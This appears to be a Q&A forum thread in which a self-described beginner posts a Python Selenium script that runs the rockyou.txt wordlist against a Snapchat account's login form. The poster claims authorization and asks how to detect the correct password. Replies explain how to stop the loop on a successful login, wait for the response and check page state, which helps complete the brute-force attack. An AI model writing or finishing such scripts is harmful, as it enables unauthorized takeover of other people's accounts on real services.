How can i brute force a web-site with python?
So I'm a beginner in computer security and I took on the challenge of cracking a Snapchat account (with authorization of course). But I started to make a script using the selenium library but my code always only shows me the latest password from my list and not the correct password. So is there someone who can help me and I assure you I have no malicious intentions.And for those who ask yes the correct password and in the password list.But what I would like to know is how to check if the password is correct because I don't have a line of code with seleniul which could allow me to do that.
import selenium
import tqdm
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from tqdm import tqdm
def Password_Cracking():
    driver = webdriver.Chrome()
    passwords = []
    for lijn in open("rockyou.txt"):
        passwords.append(lijn.strip())


    driver.get("https://www.snapchat.com/")

    eml =WebDriverWait(driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME, 'sidebar_input__lkly9')))
    eml.send_keys("")
    button =WebDriverWait(driver, 200).until(EC.element_to_be_clickable((By.CSS_SELECTOR, 'button.ColoredButton_blueButton__IeoF4.buttons_sdsButton__57EIz')))
    button.click()
    print(driver.page_source)
    button3 =WebDriverWait(driver, 200).until(EC.element_to_be_clickable((By.CSS_SELECTOR, 'button.sdsm-button.button-compact.button-primary.css-1jxg2jk')))
    password =driver.find_element(By.ID,'password')
    for lijn in tqdm(passwords):
       try:
          password.clear()
          password.send_keys(lijn)
          button2 =driver.find_element(By.ID, "password-submit-button")
          button2.click()
          



       except:
          pass
    return (lijn)
    print(lijn)



Password_Cracking()




So I managed to do almost everything except find the right password. But a big problem is that I don't know how to tell my code if this password is correct using selenium.

Your loop tries all passwords then exits leaving lijn the last one in the list. You need to exit the loop when you detect a correct attempt.

Here:
    for lijn in tqdm(passwords):
       try:
          password.clear()
          password.send_keys(lijn)
          button2 =driver.find_element(By.ID, "password-submit-button")
          button2.click()
          



       except:
          pass
    return (lijn)

You loop through the passwords, click on the button with each and return the last one. Inside the try you will need to check whether it's correct. The trick is that when you click on the button the result will likely not be ready instantly, so you will need to wait for the response. You can perform explicit wait via WebDriverWait like you did or FluentWait, see more here: https://www.browserstack.com/guide/wait-commands-in-selenium-webdriver
Also read this: How can I make Selenium/Python wait for the user to login before continuing to run?
You did not provide much information about the website you want to brute force, so it is up to you to decide how it is knowable whether the login has been successful, but it definitely involves attempts to log in, waiting for response and checking the state.

@technolinetechno in comments the code breaks into a single line so the white characters cannot be seen. This is why I kindly ask you to edit the question with the updated code there so we could see it. The comment box sadly breaks the entirety of your code into a single line. You await for an element with the id of 'root' to appear. Is it true that it was missing from the page when the authentication is being requested, but it's there if the login succeeded? Will it be there if the login fails too?
